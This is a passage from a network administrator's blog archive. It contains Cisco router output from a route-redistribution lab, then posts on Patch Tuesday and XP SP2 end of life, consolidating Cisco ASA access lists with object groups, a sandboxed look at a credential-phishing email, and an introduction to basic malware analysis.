R3#sh ip rip database
172.19.0.0/16 auto-summary
172.19.200.0/24 directly connected, FastEthernet0/0
222.102.23.0/24 auto-summary
222.102.23.0/24 redistributed
[1] via 0.0.0.0,
R3#

+++++++ R4

R4#sh ip route ospf
O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
R4#

Below are the relevant out put from R2, which shows that R2 is not using the EIGRP learned routes to 222.102.23.0/24 and 198.200.230.0/24, but is using the OSPF and RIP routes instead.   As mentioned earlier, the requirement for this scenario is that R2 uses the EIGRP routes originated from R0, since they are the primary source.  In Part 2, I’ll go through the configuration added on R2 to make that happen.  If you do have ideas flowing through your head, please feel free to post your comment.

Until Next Time (AJ)


R2#sh ip route 222.102.23.1
Routing entry for 222.102.23.0/24
Known via "rip", distance 120, metric 1
Redistributing via rip
Last update from 172.19.200.2 on FastEthernet1/0, 00:00:11 ago
Routing Descriptor Blocks:
* 172.19.200.2, from 172.19.200.2, 00:00:11 ago, via FastEthernet1/0
Route metric is 1, traffic share count is 1
R2#sh ip route 198.200.230.0
Routing entry for 198.200.230.0/24
Known via "ospf 100", distance 110, metric 20, type extern 2, forward metric 1
Redistributing via eigrp 200
Advertised by eigrp 200 metric 1 1 1 1 1
Last update from 172.19.200.3 on FastEthernet1/0, 1d02h ago
Routing Descriptor Blocks:
* 172.19.200.3, from 172.19.200.3, 1d02h ago, via FastEthernet1/0
Route metric is 20, traffic share count is 1
R2#sh ip eigrp topology 222.102.23.0/24
IP-EIGRP (AS 200): Topology entry for 222.102.23.0/24
State is Passive, Query origin flag is 1, 0 Successor(s), FD is 4294967295
Routing Descriptor Blocks:
10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
Composite metric is (2560002816/2560000256), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 110 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 1
External data:
Originating router is 172.32.27.1
AS number of route is 65001
External protocol is BGP, external metric is 0
Administrator tag is 65000 (0x0000FDE8)
R2#sh ip eigrp topology 198.200.230.0/24
IP-EIGRP (AS 200): Topology entry for 198.200.230.0/24
State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560000256
Routing Descriptor Blocks:
172.19.200.3, from Redistributed, Send flag is 0x0
Composite metric is (2560000256/0), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 10 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 0
External data:
Originating router is 192.168.20.2 (this system)
AS number of route is 100
External protocol is OSPF, external metric is 20
Administrator tag is 0 (0x00000000)
10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
Composite metric is (2560002816/2560000256), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 110 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 1
External data:
Originating router is 172.32.27.1
AS number of route is 65001
External protocol is BGP, external metric is 0
Administrator tag is 65000 (0x0000FDE8)
R2#

+++++++ R1
R1#sh ip route eigrp
172.19.0.0/24 is subnetted, 1 subnets
D EX 172.19.200.0 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
11.0.0.0/32 is subnetted, 1 subnets
D EX 11.12.13.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
14.0.0.0/32 is subnetted, 1 subnets
D EX 14.15.16.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
R1#sh ip bgp neighbors 10.146.12.2 advertised-routes | b Net
Network Next Hop Metric LocPrf Weight Path
*> 172.32.27.0/24 0.0.0.0 0 32768 i


+++++++ R2
Jul 13 2010

Patch Tuesday & XP SP2 end of life

In the words of Microsoft patch Tuesday is defined as ” When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

Now just in case you are wondering why I am choosing today to talk about patch Tuesdays of all days, well for starters today is significant because  patches,  and support for XP SP2 officially ends today. This might not seem like a big deal for a lot of people but I know the are several  companies that still run legacy software that are not supported by SP3 or above. So in short any new vulnerabilities that are discovered in the coming months or years will have all those users at there disposal just waiting to be exploited!

If you think that’s bad what about if a vulnerability was already  reported to Microsoft years ago and it was never patched, then those users could have already been exploited. A reference for this was a statement made by HD Moore on twitter today, “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006. “ HDM is the Chief Architect of Metasploit project, the project was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like this was in the wrong hands, sky’s the limit.

So for anyone that is still using XP SP2 time to apply the following patches below, and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

  • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
  • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
  • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
  • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.

References:

http://www.microsoft.com/security/updates/bulletins/default.aspx

http://isc.sans.edu/diary.html?storyid=9166&rss

http://www.microsoft.com/security/updates/bulletins/201007.aspx

Jul 09 2010

Cleaning up your access list

As a Network Admin you would soon realize after a few months of adding various  ACL rules there comes a time when you need to go back and consolidate those rules before it gets out of hand.

Now that most cloud providers are moving away from the traditional (80, 443) TCP ports and moving towards your none standard (8800, 3995) ports, your job as a Network admin requires you to now plan a bit more.

Normally if I got a call that a users is unable to access a certain web, I would first verify if its a “URL filtering issue” or a “Firewall” access issue. If I determined that its the latter, I would then write a typical ACL and grant the user access after the requested service has been test.

For instance if you receive a call about not being able to access a website X on port 5454, you can write a basic ACL rule:

access-list external_access extended permit tcp 192.168.10.5 255.255.255.0 69.196.224.24 255.255.255.0 eq 5454

Now the above rule would work just fine, but think about it if you recieve about 10-15 of those request a day, your firewall will be a mess after a while. The way to take care of this is by using Using Network Objects and Groups in a Rule.

Network objects let you predefine host and network IP addresses so that you can streamline subsequent configuration. When you configure the security policy, such as an access rule or a AAA rule, you can choose these predefined addresses instead of typing them in manually. Moreover, if you change the definition of an object, the change is inherited automatically by any rules using the object.

Below is how you would accomplish this if you reieved say three request  for web related access all on different ports:

======================================
Creating Object group and adding ports Cisco ASA Firewall
======================================

config t
object-group service External_Acess tcp
description Access to external websites
port-object eq 7778
port-object eq 5454
port-object eq 3322

object-group network External_Access_Users
description Access to external websites
network-object host 192.168.10.5
network-object host 192.168.10.7
network-object host 192.168.10.9

=======================================
Creating ACL and applying object group
========================================
access-list acl_inside remark ***** External  Websites Access *****
access-list acl_inside extended permit tcp object-group External_Access_Users any object-group External_Acess

Now the next time you receive a request for external website access on a none standard port you simply add the port to the service group, and the Host IP to the network access group and you are set. Now that’s much more easy on the eyes to look at!

If you have another way of achieving the same outcome don’t hesitate to leave a comment, in the end its all about learning.

Jul 08 2010

Yet another Phising email

Today one of our faculty member forward an email to our help-desk and indicated we take a look at it because it might be a phising/spam email, you can only image how happy that made me. Now in the past we have had cases where people would reply to these type of emails and receive more  spam in the process, or worst, “give their credentials away” but that was not the case today.

Below is an image of the email that was received today.

Fig-1 Phising Email

Now the first thing that I found funny about this email is the fact that the phone number for tech support was an IP Address, maybe the overlooked that one or it was done out of humor either way it set off some flags for me and it should for anyone that receives an email like this.

Once I identified the email as a phising attempt to harvest login credentials I got curious and decided to load Firefox within sandboxie and clicked on the link in the email to see what it would do.

Fig-2 Firefox Untrusted Error

Now after clicking on the link in the email I was redirected to www.eformit.com , which triggered a FireFox error because Firefox was unable to confirm that my connection to the site was secure. Since I was in search of seeing where the link would take me I went ahead and added the certificate and continued. In general if you ever get this error you should never add the certificate but instead close out your browser and do some research on the site in question.

Next I went ahead and examine the server SSL certificate and realized that it expired a few days ago, that’s another reason that would tell me this site was bad business, but since I already knew that I proceeded all the same.

Fig-3 Expired Cert

Now on to the next portion of this journey, after clicking on the link I was taken to a website with a very contradictory notice, “we will never send emails to users requesting email account information” however that’s exactly what the page is asking you to type in.

Fig-4 Credentials harvesting form

Now lastly after filling in my email and password :), I was redirected to a parking page filled with cheap advertising another sign of trouble.

Fig-5 Redirected page

Additional information courtesy of  http://anubis.iseclab.org a very useful source for analyzing uncertain files and URL’s.

Fig-6 Additional network analysis information

In the end its always important to train your users to identify what a good or bad email look like and what your network policies are for these type of emails. Also when in doubt load-up your sandbox and have some fun.

References

http://scanner.novirusthanks.org/

http://anubis.iseclab.org

http://www.sandboxie.com/

Jun 26 2010

Malware Analysis 101


I few months back I did a presentation on the topic of  basic malware analysis, feel free to grab a copy  of  the slides –> Malware Analysis 101, the idea was to get across a few pointers  on how to get started analyzing malware. I am by no means an expert on the subject matter, I only recently started doing some research in the area to try and understand what really happens to a system once its infected with malware. I used materials from several sources, and was also given some good pointers by Tim over at http://securitybraindump.blogspot.com/.

As a computer repair tech you normally don’t have the luxury or studying an infection since you are always on the clock and time literally  means money. However after seeing a certain trend of injection and having several repeat calls from some of my clients I decided to take a step back and instead of just cleaning the infection, this time I copied the infected sample and start to analyze it.

During my analysis I basically narrowed it down to the following phases:

  • Phase one “System Baseline”
  • Phase two “Simple Execution”
  • Phase three “Review Changes”
  • Phase four “Tweaking/Using your tools”
  • Phase five “Lesson Learn”

I will do a followup post to this one since I didn’t show any of the detail results and from my demo portion in the slides. I am hoping to get some feedback from this post so I can revise my current process.

References:

Alibi3col theme by Themocracy

css.php